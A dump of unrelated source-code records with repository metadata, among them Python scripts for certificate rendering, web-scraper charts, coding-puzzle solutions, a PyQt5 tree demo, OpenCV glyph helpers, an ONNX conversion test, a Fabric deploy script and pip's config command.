# # img.save(f)
def generateCert(type, code, name, gender, unit,grade,title,avai_year,avai_mouth,avai_day,avatar):
    """Render a membership certificate JPEG and display it.

    Draws the certificate type/serial, member details, the valid-until date
    (``avai_mouth`` is a typo for "month") and today's issue date onto
    assets/cert.jpg, then pastes an avatar photo.
    NOTE(review): the *avatar* argument is ignored -- the default avatar is
    always pasted; ``type`` also shadows the builtin of the same name.
    """
    curr_time = datetime.datetime.now()
    localdate = curr_time.strftime("%Y-%m-%d").split("-")  # [YYYY, MM, DD]
    image = Image.open('assets/cert.jpg')
    fontPath = "assets/msyh.ttf"
    setFont = ImageFont.truetype(fontPath, 70)   # main field font
    dateFont = ImageFont.truetype(fontPath,50)   # smaller date font
    draw = ImageDraw.Draw(image)
    # Header: certificate type and serial number.
    draw.text((700, 260), type, fill="black", font=setFont)
    draw.text((700, 400), code, fill="black", font=setFont)
    # Member details.
    draw.text((1290, 1500), name, fill="black", font=setFont)
    draw.text((1290, 1630), gender, fill="black", font=setFont)
    draw.text((1430, 1760), unit, fill="black", font=setFont)
    draw.text((1430, 1890), grade, fill="black", font=setFont)
    draw.text((1290, 2010), title, fill="black", font=setFont)
    # Valid-until date.
    draw.text((1230, 2295), avai_year, fill="black", font=dateFont)
    draw.text((1450, 2295), avai_mouth, fill="black", font=dateFont)
    draw.text((1600, 2295), avai_day, fill="black", font=dateFont)
    # Issue date (today).
    draw.text((1660, 2805), localdate[0], fill="black", font=dateFont)
    draw.text((1870, 2805), localdate[1], fill="black", font=dateFont)
    draw.text((2010, 2805), localdate[2], fill="black", font=dateFont)
    avatar = Image.open("assets/defaultavatar.jpg").convert("CMYK")
    avatar = avatar.resize((400,560))
    image.paste(avatar,(585,1525))
    image.show()
generateCert("37373737373737", "普通会员", "张三", "男", "南昌大学", "二级", "讲师", "2020","11","20","" )
| [
"1534296263@qq.com"
] | 1534296263@qq.com |
579496a4ada0cb14b1e59a2b9b0b835e5ce6c8ee | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/M/mick/test_395.py | 215e88633f5bb3f554649c55ba67ce4f7bef9adc | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | import scraperwiki
import gviz_api
# HTML shell for the report; %(jscode)s / %(jscode_chart)s are filled with the
# Google Visualization JS emitted by gviz_api below.  (Python 2 script.)
page_template = """
<html>
<head>
<title>Bar-Meter</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script>
google.load("visualization", "1", {packages:["table","corechart"]});
google.setOnLoadCallback(drawTable);
function drawTable() {
%(jscode)s
var jscode_table = new google.visualization.Table(document.getElementById('table_div_jscode'));
jscode_table.draw(jscode_data, {showRowNumber: true});
%(jscode_chart)s
var chart = new google.visualization.PieChart(document.getElementById('chart_div'));
chart.draw(jscode_data_chart, {title: 'Bars per city'});
}
</script>
</head>
<body>
<H1>Bars in Austrian cities</H1>
<div id="table_div_jscode"></div>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
</body>
</html>
"""
def main():
    """Query the scraped at_herold_branches data and print the HTML report
    (a bar count table plus a bars-per-city pie chart) to stdout."""
    scraperwiki.sqlite.attach("at_herold_branches")
    # Bars per city, most first.
    data = scraperwiki.sqlite.select(
        '''city, branch, count(*) as business from at_herold_branches.swdata
where branch='was_bars'
group by city, branch
order by business desc'''
    )
    description = {"city": ("string", "City"),
                   "branch": ("string", "Branch"),
                   "business": ("number", "Count")}
    data_table = gviz_api.DataTable(description)
    data_table.LoadData(data)
    # Creating a JavaScript code string
    jscode = data_table.ToJSCode("jscode_data",
                                 columns_order=("city", "branch", "business"))
    # Creating a JSon string
    #json = data_table.ToJSon(columns_order=("city", "branch", "business"),
    #                         order_by="city")
    # All businesses per city, for the pie chart.
    data_chart = scraperwiki.sqlite.select(
        '''city, count(*) as business from at_herold_branches.swdata
group by city'''
    )
    description_chart = {"city": ("string", "City"),
                         "business": ("number", "Count")}
    data_table_chart = gviz_api.DataTable(description_chart)
    data_table_chart.LoadData(data_chart)
    jscode_chart = data_table_chart.ToJSCode("jscode_data_chart",
                                             columns_order=("city", "business"),
                                             order_by="city")
    print page_template % vars()
main()
import scraperwiki
import gviz_api
# NOTE(review): this is a verbatim duplicate of the scraper script earlier in
# this blob (a dataset artifact); redefining page_template/main and calling
# main() again simply reruns the same report.
page_template = """
<html>
<head>
<title>Bar-Meter</title>
<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script>
google.load("visualization", "1", {packages:["table","corechart"]});
google.setOnLoadCallback(drawTable);
function drawTable() {
%(jscode)s
var jscode_table = new google.visualization.Table(document.getElementById('table_div_jscode'));
jscode_table.draw(jscode_data, {showRowNumber: true});
%(jscode_chart)s
var chart = new google.visualization.PieChart(document.getElementById('chart_div'));
chart.draw(jscode_data_chart, {title: 'Bars per city'});
}
</script>
</head>
<body>
<H1>Bars in Austrian cities</H1>
<div id="table_div_jscode"></div>
<div id="chart_div" style="width: 900px; height: 500px;"></div>
</body>
</html>
"""
def main():
    """Query the scraped at_herold_branches data and print the HTML report."""
    scraperwiki.sqlite.attach("at_herold_branches")
    data = scraperwiki.sqlite.select(
        '''city, branch, count(*) as business from at_herold_branches.swdata
where branch='was_bars'
group by city, branch
order by business desc'''
    )
    description = {"city": ("string", "City"),
                   "branch": ("string", "Branch"),
                   "business": ("number", "Count")}
    data_table = gviz_api.DataTable(description)
    data_table.LoadData(data)
    # Creating a JavaScript code string
    jscode = data_table.ToJSCode("jscode_data",
                                 columns_order=("city", "branch", "business"))
    # Creating a JSon string
    #json = data_table.ToJSon(columns_order=("city", "branch", "business"),
    #                         order_by="city")
    data_chart = scraperwiki.sqlite.select(
        '''city, count(*) as business from at_herold_branches.swdata
group by city'''
    )
    description_chart = {"city": ("string", "City"),
                         "business": ("number", "Count")}
    data_table_chart = gviz_api.DataTable(description_chart)
    data_table_chart.LoadData(data_chart)
    jscode_chart = data_table_chart.ToJSCode("jscode_data_chart",
                                             columns_order=("city", "business"),
                                             order_by="city")
    print page_template % vars()
main()
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
661166baa4aeb5d49e0acef2a214a82c99197977 | 58afefdde86346760bea40690b1675c6639c8b84 | /leetcode/frog-position-after-t-seconds/386090832.py | 9a855ba87a746a4da2b3445c88f2d2167012e3ee | [] | no_license | ausaki/data_structures_and_algorithms | aaa563f713cbab3c34a9465039d52b853f95548e | 4f5f5124534bd4423356a5f5572b8a39b7828d80 | refs/heads/master | 2021-06-21T10:44:44.549601 | 2021-04-06T11:30:21 | 2021-04-06T11:30:21 | 201,942,771 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 914 | py | # title: frog-position-after-t-seconds
# detail: https://leetcode.com/submissions/detail/386090832/
# datetime: Tue Aug 25 17:01:25 2020
# runtime: 100 ms
# memory: 14 MB
class Solution:
    def frogPosition(self, n: int, edges: List[List[int]], t: int, target: int) -> float:
        """Probability that a frog starting at vertex 1 of an undirected tree
        sits on *target* after *t* one-second hops.

        The frog jumps to an unvisited neighbour uniformly at random and
        stays put forever once no unvisited neighbour remains.
        (Removed the original's dead, never-used `visited` set.)
        """
        # Undirected adjacency list.
        g = collections.defaultdict(list)
        for a, b in edges:
            g[a].append(b)
            g[b].append(a)

        def jump(node, parent, time_left):
            # Children = neighbours minus the parent edge (the root has none).
            children = len(g[node]) - (node != 1)
            if node == target:
                # Must either be stuck here (no children) or arrive on time.
                return 1 if (children == 0 or time_left == 0) else 0
            if time_left == 0:
                return 0
            for nxt in g[node]:
                if nxt == parent:
                    continue
                p = jump(nxt, node, time_left - 1)
                if p:
                    # Scale by the uniform choice among this node's children.
                    return p / children
            return 0

        return jump(1, 0, t)
"ljm51689@gmail.com"
] | ljm51689@gmail.com |
d2738856b779dd77745eccd9ba6a256cc478cd52 | aca253ff1a97c96a1a0a9a5802aa623789662bb1 | /p036/modify_tree.py | 85501c51bdad36228626e0879d0805eb3bab30d1 | [] | no_license | KD-huhu/PyQt5 | a6128a34b93f6e2da7216d5818f66dc9614216bc | 1c33a6549c2fcf663168256553d8c24e25d9a69c | refs/heads/master | 2022-07-03T07:37:29.837547 | 2020-05-17T14:54:39 | 2020-05-17T14:54:39 | 261,768,854 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,719 | py | import sys
from PyQt5.QtWidgets import *
class ModifyTree(QWidget):
    """Demo widget: a two-column QTreeWidget plus buttons that add, rename,
    and delete nodes.  (UI strings are intentionally left in Chinese.)"""

    def __init__(self, parent=None):
        super(ModifyTree, self).__init__(parent)
        self.setWindowTitle('TreeWidget 例子')
        # Button row for the three tree operations.
        operatorLayout = QHBoxLayout()
        addBtn = QPushButton('添加节点')
        updateBtn = QPushButton('修改节点')
        deleteBtn = QPushButton('删除节点')
        operatorLayout.addWidget(addBtn)
        operatorLayout.addWidget(updateBtn)
        operatorLayout.addWidget(deleteBtn)
        addBtn.clicked.connect(self.addNode)  # connect the slots
        updateBtn.clicked.connect(self.updateNode)
        deleteBtn.clicked.connect(self.deleteNode)
        self.tree = QTreeWidget()  # build the tree widget
        self.tree.setColumnCount(2)
        self.tree.setHeaderLabels(['Key','Value'])
        # Seed a small sample tree: root -> child1, child2 -> child3.
        root = QTreeWidgetItem(self.tree)
        root.setText(0,'root')
        root.setText(1, '0')
        child1 = QTreeWidgetItem(root)
        child1.setText(0,'child1')
        child1.setText(1,'1')
        child2 = QTreeWidgetItem(root)
        child2.setText(0,'child2')
        child2.setText(1,'2')
        child3 = QTreeWidgetItem(child2)
        child3.setText(0,'child3')
        child3.setText(1,'3')
        self.tree.clicked.connect(self.onTreeClicked)
        mainLayout = QVBoxLayout(self)
        mainLayout.addLayout(operatorLayout)
        mainLayout.addWidget(self.tree)
        self.setLayout(mainLayout)

    def onTreeClicked(self,index):
        # Log the clicked row index and the selected item's key/value pair.
        item = self.tree.currentItem()
        print(index.row())
        print('key=%s,value=%s' % (item.text(0),item.text(1)))

    def addNode(self):  # add a child under the selected node
        print('添加节点')
        item = self.tree.currentItem()  # currently selected node
        print(item)
        node = QTreeWidgetItem(item)  # new item parented to the selection
        node.setText(0,'新节点')
        node.setText(1,'新值')

    def updateNode(self):  # rename the selected node in place
        print('修改节点')
        item = self.tree.currentItem()
        item.setText(0,'修改节点')
        item.setText(1, '值已经被修改')

    def deleteNode(self):  # remove every selected node
        print('删除节点')
        item = self.tree.currentItem()  # current node
        root = self.tree.invisibleRootItem()  # parent of top-level items
        for item in self.tree.selectedItems():  # detach each from its parent
            (item.parent() or root).removeChild(item)
if __name__ == '__main__':
app = QApplication(sys.argv)
tree = ModifyTree()
tree.show()
sys.exit(app.exec_())
| [
"noreply@github.com"
] | KD-huhu.noreply@github.com |
1f5468676d551ebb3f849b542fc5defe208c8f8c | 731c3f2f85f6002725322eedc0b2c8b5e74f610e | /1-jakc/jakc_hr_schedule/models/jakc_hr_employee.py | f81455e3f0490de9f60a0733819918ac05534423 | [] | no_license | babarlhr/project-0021 | 1ac824657f893c8f25d6eb3b839051f350d7cc9d | e30b8a9f5d2147d3ca5b56b69ec5dbd22f712a91 | refs/heads/master | 2021-09-22T15:45:47.431000 | 2018-09-11T14:59:49 | 2018-09-11T14:59:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | from openerp import fields, models, api, _
from openerp.exceptions import Warning, ValidationError
import logging
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
class HrEmployee(models.Model):
_inherit = 'hr.employee'
nik = fields.Char('NIK', size=20, required=True)
| [
"wahhid@gmail.com"
] | wahhid@gmail.com |
c7a08b2e9d4d981344d5de6f125cc2b7bb211375 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02804/s852532161.py | db55ddcaa9dc897931e5c7429d31e68beae24140 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | n,k=map(int,input().split())
A=list(map(int,input().split()))
mod=10**9+7
A.sort()
def cmb(n, r, mod):
if ( r<0 or r>n ):
return 0
r = min(r, n-r)
return g1[n] * g2[r] * g2[n-r] % mod
N = 10**5
g1 = [1, 1] # 元テーブル
g2 = [1, 1] #逆元テーブル
inverse = [0, 1] #逆元テーブル計算用テーブル
for i in range( 2, N + 1 ):
g1.append( ( g1[-1] * i ) % mod )
inverse.append( ( -inverse[mod % i] * (mod//i) ) % mod )
g2.append( (g2[-1] * inverse[-1]) % mod )
ans,bns=0,0
for j in range(n-k+1):
ans=(ans+(A[n-j-1]-A[j])*cmb(n-j-1,k-1,mod))%mod
print(ans%mod) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
55adec22c2b1a4fd58bcba0728db6e2560ac8d54 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/ip_messaging/v2/__init__.py | ebd0c69459eafe129379c2b02fe69211ed1fe8af | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a7d8849526bea15c375620047af3b52bac72acf3b87db9881e9bddafd4c1c295
size 1343
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
90256ce535bb47bd3131fa27540b688141cd699c | a9305f461b2c03e4a55fec9f1ecc75f78265eb8e | /opencv/Realidade-Aumentada-master/insertObject/glyphfunctions.py | c5cdbb695347ab7fb65ec816e467b7e27d9f5fd8 | [] | no_license | JoaoBueno/estudos-python | 653afb174f2d141fcc82511c51cbfd2bca1b55cb | 606e188e88ee3a2b2e1daee60c71948c678228e1 | refs/heads/master | 2022-01-24T20:17:52.702768 | 2022-01-19T20:39:20 | 2022-01-19T20:39:20 | 150,925,137 | 2 | 2 | null | 2022-01-19T20:40:46 | 2018-09-30T03:09:08 | Python | UTF-8 | Python | false | false | 3,278 | py | import cv2
import numpy as np
def order_points(points):
s = points.sum(axis=1)
diff = np.diff(points, axis=1)
ordered_points = np.zeros((4,2), dtype="float32")
ordered_points[0] = points[np.argmin(s)]
ordered_points[2] = points[np.argmax(s)]
ordered_points[1] = points[np.argmin(diff)]
ordered_points[3] = points[np.argmax(diff)]
return ordered_points
def max_width_height(points):
(tl, tr, br, bl) = points
top_width = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
bottom_width = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
max_width = max(int(top_width), int(bottom_width))
left_height = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
right_height = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
max_height = max(int(left_height), int(right_height))
return (max_width,max_height)
def topdown_points(max_width, max_height):
return np.array([
[0, 0],
[max_width-1, 0],
[max_width-1, max_height-1],
[0, max_height-1]], dtype="float32")
def get_topdown_quad(image, src):
# src and dst points
src = order_points(src)
(max_width,max_height) = max_width_height(src)
dst = topdown_points(max_width, max_height)
# warp perspective
matrix = cv2.getPerspectiveTransform(src, dst)
warped = cv2.warpPerspective(image, matrix, max_width_height(src))
# return top-down quad
return warped
def get_glyph_pattern(image, black_threshold, white_threshold):
# collect pixel from each cell (left to right, top to bottom)
cells = []
cell_half_width = int(round(image.shape[1] / 10.0))
cell_half_height = int(round(image.shape[0] / 10.0))
row1 = cell_half_height*3
row2 = cell_half_height*5
row3 = cell_half_height*7
col1 = cell_half_width*3
col2 = cell_half_width*5
col3 = cell_half_width*7
cells.append(image[row1, col1])
cells.append(image[row1, col2])
cells.append(image[row1, col3])
cells.append(image[row2, col1])
cells.append(image[row2, col2])
cells.append(image[row2, col3])
cells.append(image[row3, col1])
cells.append(image[row3, col2])
cells.append(image[row3, col3])
# threshold pixels to either black or white
for idx, val in enumerate(cells):
if val < black_threshold:
cells[idx] = 0
elif val > white_threshold:
cells[idx] = 1
else:
return None
return cells
def get_vectors(image, points):
# order points
points = order_points(points)
# load calibration data
with np.load('R1.npz') as X:
mtx, dist, _, _ = [X[i] for i in ('mtx','dist','rvecs','tvecs')]
# set up criteria, image, points and axis
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 30, 0.001)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
imgp = np.array(points, dtype="float32")
objp = np.array([[0.,0.,0.],[1.,0.,0.],[1.,1.,0.],[0.,1.,0.]], dtype="float32")
# calculate rotation and translation vectors
cv2.cornerSubPix(gray,imgp,(11,11),(-1,-1),criteria)
rvecs, tvecs, _ = cv2.solvePnPRansac(objp, imgp, mtx, dist)
return rvecs, tvecs | [
"heavyhide@gmail.com"
] | heavyhide@gmail.com |
f08bb2bf9dddb60974d27a3fbedbb68e56233d38 | 7d8e040cb703e6f6e2d55b5dc64fc9124d85dde8 | /tests/test_sklearn_gaussian_process_classifier.py | cc65cc32b1d02e64a75788f2b0aa18cd2d1849a7 | [
"MIT"
] | permissive | Global-localhost/sklearn-onnx | fc44aa481a91482f187cfd2307df6061b77742af | a8267e7ba946d8b0596951060e5dca39fec47439 | refs/heads/master | 2023-03-23T00:19:31.474251 | 2021-03-03T19:17:12 | 2021-03-03T19:17:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,957 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import unittest
from distutils.version import StrictVersion
import numpy as np
from numpy.testing import assert_almost_equal
import scipy
from onnxruntime import InferenceSession, SessionOptions
try:
from onnxruntime.capi.onnxruntime_pybind11_state import Fail as OrtFail
except ImportError:
OrtFail = RuntimeError
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn import __version__ as sklver
try:
from sklearn.gaussian_process import GaussianProcessClassifier
except ImportError:
GaussianProcessClassifier = None
from skl2onnx.common.data_types import FloatTensorType, DoubleTensorType
from skl2onnx import to_onnx
from skl2onnx.helpers.onnx_helper import change_onnx_domain
from test_utils import dump_data_and_model, TARGET_OPSET
sklver_ = ".".join(sklver.split('.')[:2])
class TestSklearnGaussianProcessClassifier(unittest.TestCase):
@classmethod
def setUpClass(cls):
try:
from ortcustomops import (
onnx_op, PyCustomOpDef, get_library_path)
except ImportError:
return
@onnx_op(op_type="SolveFloat",
inputs=[PyCustomOpDef.dt_float, PyCustomOpDef.dt_float],
outputs=[PyCustomOpDef.dt_float])
def solveopf(a, b):
# The user custom op implementation here.
return scipy.linalg.solve(a, b).astype(np.float32)
@onnx_op(op_type="SolveDouble",
inputs=[PyCustomOpDef.dt_double, PyCustomOpDef.dt_double],
outputs=[PyCustomOpDef.dt_double])
def solveopd(a, b):
# The user custom op implementation here.
return scipy.linalg.solve(a, b).astype(np.float64)
cls.path = get_library_path()
def fit_classification_model(self, gp, n_classes=2):
data = load_iris()
X, y = data.data, data.target
if n_classes == 2:
y = y % 2
elif n_classes != 3:
raise NotImplementedError("n_classes must be 2 or 3")
X_train, X_test, y_train, y_test = train_test_split(
X, y, random_state=3)
gp.fit(X_train, y_train)
return gp, X_test.astype(np.float32)
def common_test_gpc(self, dtype=np.float32, n_classes=2):
gp = GaussianProcessClassifier()
gp, X = self.fit_classification_model(gp, n_classes=n_classes)
# return_cov=False, return_std=False
if dtype == np.float32:
cls = FloatTensorType
else:
cls = DoubleTensorType
model_onnx = to_onnx(
gp, initial_types=[('X', cls([None, None]))],
target_opset=TARGET_OPSET,
options={GaussianProcessClassifier: {
'zipmap': False, 'optim': 'cdist'}})
self.assertTrue(model_onnx is not None)
try:
sess = InferenceSession(model_onnx.SerializeToString())
except OrtFail:
if not hasattr(self, 'path'):
return
suffix = 'Double' if dtype == np.float64 else 'Float'
# Operator Solve is missing
model_onnx = change_onnx_domain(
model_onnx, {'Solve': ('Solve%s' % suffix, 'ai.onnx.contrib')})
so = SessionOptions()
so.register_custom_ops_library(self.path)
sess = InferenceSession(model_onnx.SerializeToString(), so)
res = sess.run(None, {'X': X.astype(dtype)})
assert_almost_equal(res[0].ravel(), gp.predict(X).ravel())
assert_almost_equal(res[1], gp.predict_proba(X),
decimal=3)
return
dt = 32 if dtype == np.float32 else 64
dump_data_and_model(
X.astype(dtype), gp, model_onnx, verbose=False,
basename="SklearnGaussianProcessRBFT%d%d" % (n_classes, dt))
@unittest.skipIf(TARGET_OPSET < 12, reason="einsum")
@unittest.skipIf(GaussianProcessClassifier is None,
reason="scikit-learn is too old")
@unittest.skipIf(StrictVersion(sklver_) < StrictVersion("0.22"),
reason="not available")
def test_gpc_float_bin(self):
self.common_test_gpc(dtype=np.float32)
@unittest.skipIf(TARGET_OPSET < 12, reason="einsum, reciprocal")
@unittest.skipIf(GaussianProcessClassifier is None,
reason="scikit-learn is too old")
@unittest.skipIf(StrictVersion(sklver_) < StrictVersion("0.22"),
reason="not available")
def test_gpc_double_bin(self):
self.common_test_gpc(dtype=np.float64)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | Global-localhost.noreply@github.com |
c1c6e061d4012ce3011878e9be9c295ead79c428 | a7dad581abcc74dd191754268131ff2ebef060fc | /fabfile.py | f16c5d1bf778c9e64bfdc2d6b25d034fd7a36380 | [] | no_license | jeremyjbowers/can-i-vote | 5eeba4c82ab1a1f6fe94b6baaec691ecc82eea4a | 2388b285387f59e271759d3fa71c6831b7414b38 | refs/heads/master | 2020-05-16T22:25:58.515072 | 2012-10-07T19:04:24 | 2012-10-07T19:04:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | true | false | 446 | py | #!/usr/bin/env python
from fabric.api import *
"""
Base configuration
"""
env.project_name = 'vote'
env.user = 'root'
env.repo_path = '/home/canivote/can-i-vote/%(project_name)s' % env
"""
Environments
"""
def prod():
env.hosts = ['198.61.200.10']
"""
Commands
"""
def git_pull(release):
with cd(env.repo_path):
run('git pull origin %s' % release)
def restart():
with cd(env.repo_path):
run('utils/restart_gunicorn.sh') | [
"jeremyjbowers@gmail.com"
] | jeremyjbowers@gmail.com |
05a4f511f05f4671e829cce55a8c86fcf668af92 | 05b24701576cc5d470b6ab49b25f966d3764c2d2 | /venv/Lib/site-packages/pip/_internal/commands/configuration.py | 31e040923ccea0d7396b56a98efd233422e4771f | [
"MIT"
] | permissive | taneemishere/Spam-Comment-Detector | e80d27cdc679ad55a774052c9fa8f897fe38a514 | b0c75cc00ef584a571ab1b2b579a6016b3504792 | refs/heads/main | 2023-01-24T01:06:57.299863 | 2020-11-14T05:29:58 | 2020-11-14T05:29:58 | 305,711,846 | 2 | 1 | MIT | 2020-11-12T07:03:38 | 2020-10-20T13:10:41 | Jupyter Notebook | UTF-8 | Python | false | false | 8,168 | py | import logging
import os
import subprocess
from pip._internal.cli.base_command import Command
from pip._internal.cli.status_codes import ERROR, SUCCESS
from pip._internal.configuration import (
Configuration, get_configuration_files, kinds,
)
from pip._internal.exceptions import PipError
from pip._internal.utils.deprecation import deprecated
from pip._internal.utils.misc import get_prog
from pip._internal.utils.virtualenv import running_under_virtualenv
logger = logging.getLogger(__name__)
class ConfigurationCommand(Command):
"""Manage local and global configuration.
Subcommands:
list: List the active configuration (or from the file specified)
edit: Edit the configuration file in an editor
get: Get the value associated with name
set: Set the name=value
unset: Unset the value associated with name
If none of --user, --global and --site are passed, a virtual
environment configuration file is used if one is active and the file
exists. Otherwise, all modifications happen on the to the user file by
default.
"""
name = 'config'
usage = """
%prog [<file-option>] list
%prog [<file-option>] [--editor <editor-path>] edit
%prog [<file-option>] get name
%prog [<file-option>] set name value
%prog [<file-option>] unset name
"""
summary = "Manage local and global configuration."
def __init__(self, *args, **kwargs):
super(ConfigurationCommand, self).__init__(*args, **kwargs)
self.configuration = None
self.cmd_opts.add_option(
'--editor',
dest='editor',
action='store',
default=None,
help=(
'Editor to use to edit the file. Uses VISUAL or EDITOR '
'environment variables if not provided.'
)
)
self.cmd_opts.add_option(
'--global',
dest='global_file',
action='store_true',
default=False,
help='Use the system-wide configuration file only'
)
self.cmd_opts.add_option(
'--user',
dest='user_file',
action='store_true',
default=False,
help='Use the user configuration file only'
)
self.cmd_opts.add_option(
'--site',
dest='site_file',
action='store_true',
default=False,
help='Use the current environment configuration file only'
)
self.cmd_opts.add_option(
'--venv',
dest='venv_file',
action='store_true',
default=False,
help=(
'[Deprecated] Use the current environment configuration '
'file in a virtual environment only'
)
)
self.parser.insert_option_group(0, self.cmd_opts)
def run(self, options, args):
handlers = {
"list": self.list_values,
"edit": self.open_in_editor,
"get": self.get_name,
"set": self.set_name_value,
"unset": self.unset_name
}
# Determine action
if not args or args[0] not in handlers:
logger.error("Need an action ({}) to perform.".format(
", ".join(sorted(handlers)))
)
return ERROR
action = args[0]
# Determine which configuration files are to be loaded
# Depends on whether the command is modifying.
try:
load_only = self._determine_file(
options, need_value=(action in ["get", "set", "unset", "edit"])
)
except PipError as e:
logger.error(e.args[0])
return ERROR
# Load a new configuration
self.configuration = Configuration(
isolated=options.isolated_mode, load_only=load_only
)
self.configuration.load()
# Error handling happens here, not in the action-handlers.
try:
handlers[action](options, args[1:])
except PipError as e:
logger.error(e.args[0])
return ERROR
return SUCCESS
def _determine_file(self, options, need_value):
# Convert legacy venv_file option to site_file or error
if options.venv_file and not options.site_file:
if running_under_virtualenv():
options.site_file = True
deprecated(
"The --venv option has been deprecated.",
replacement="--site",
gone_in="19.3",
)
else:
raise PipError(
"Legacy --venv option requires a virtual environment. "
"Use --site instead."
)
file_options = [key for key, value in (
(kinds.USER, options.user_file),
(kinds.GLOBAL, options.global_file),
(kinds.SITE, options.site_file),
) if value]
if not file_options:
if not need_value:
return None
# Default to user, unless there's a site file.
elif any(
os.path.exists(site_config_file)
for site_config_file in get_configuration_files()[kinds.SITE]
):
return kinds.SITE
else:
return kinds.USER
elif len(file_options) == 1:
return file_options[0]
raise PipError(
"Need exactly one file to operate upon "
"(--user, --site, --global) to perform."
)
def list_values(self, options, args):
self._get_n_args(args, "list", n=0)
for key, value in sorted(self.configuration.items()):
logger.info("%s=%r", key, value)
def get_name(self, options, args):
key = self._get_n_args(args, "get [name]", n=1)
value = self.configuration.get_value(key)
logger.info("%s", value)
def set_name_value(self, options, args):
key, value = self._get_n_args(args, "set [name] [value]", n=2)
self.configuration.set_value(key, value)
self._save_configuration()
def unset_name(self, options, args):
key = self._get_n_args(args, "unset [name]", n=1)
self.configuration.unset_value(key)
self._save_configuration()
def open_in_editor(self, options, args):
editor = self._determine_editor(options)
fname = self.configuration.get_file_to_edit()
if fname is None:
raise PipError("Could not determine appropriate file.")
try:
subprocess.check_call([editor, fname])
except subprocess.CalledProcessError as e:
raise PipError(
"Editor Subprocess exited with exit code {}"
.format(e.returncode)
)
def _get_n_args(self, args, example, n):
"""Helper to make sure the command got the right number of arguments
"""
if len(args) != n:
msg = (
'Got unexpected number of arguments, expected {}. '
'(example: "{} config {}")'
).format(n, get_prog(), example)
raise PipError(msg)
if n == 1:
return args[0]
else:
return args
def _save_configuration(self):
# We successfully ran a modifying command. Need to save the
# configuration.
try:
self.configuration.save()
except Exception:
logger.error(
"Unable to save configuration. Please report this as a bug.",
exc_info=1
)
raise PipError("Internal Error.")
def _determine_editor(self, options):
if options.editor is not None:
return options.editor
elif "VISUAL" in os.environ:
return os.environ["VISUAL"]
elif "EDITOR" in os.environ:
return os.environ["EDITOR"]
else:
raise PipError("Could not determine editor to use.")
| [
"taneemishere@gmail.com"
] | taneemishere@gmail.com |
f358510396aee7aceb8657337137844f32866b6c | dc760b9503033b97457702f5c0d64ba6beb52d37 | /tests/blueprints/test_documents.py | 39417b5f3244fadf8188d949fd91cc5d01bc5c9d | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | agdsn/sipa | 1862fa5f5764a6cb3ab866df724b6b9adeadbfe4 | 5e82221041de1b08129ed43f9f6036c541e2683d | refs/heads/develop | 2023-06-08T23:04:31.054933 | 2023-05-28T11:43:31 | 2023-05-28T11:43:31 | 33,961,711 | 23 | 18 | MIT | 2023-09-11T22:32:43 | 2015-04-14T23:09:34 | Python | UTF-8 | Python | false | false | 746 | py | import pytest
from tests.assertions import TestClient
@pytest.fixture(scope="module")
def client(module_test_client):
return module_test_client
def test_restriced_area(client: TestClient):
with client.renders_template("login.html"):
resp = client.assert_url_ok(
"/documents_restricted/fake-doc/", follow_redirects=True
)
assert len(resp.history) == 1
assert resp.history[0].location.startswith("/login?")
@pytest.mark.usefixtures("user_logged_in")
def test_restricted_area_logged_in(client: TestClient):
client.assert_url_response_code("/documents_restricted/fake-doc/", 404)
def test_unrestricted_area(client: TestClient):
client.assert_url_response_code("/documents/fake-doc/", 404)
| [
"lukas.juhrich@agdsn.de"
] | lukas.juhrich@agdsn.de |
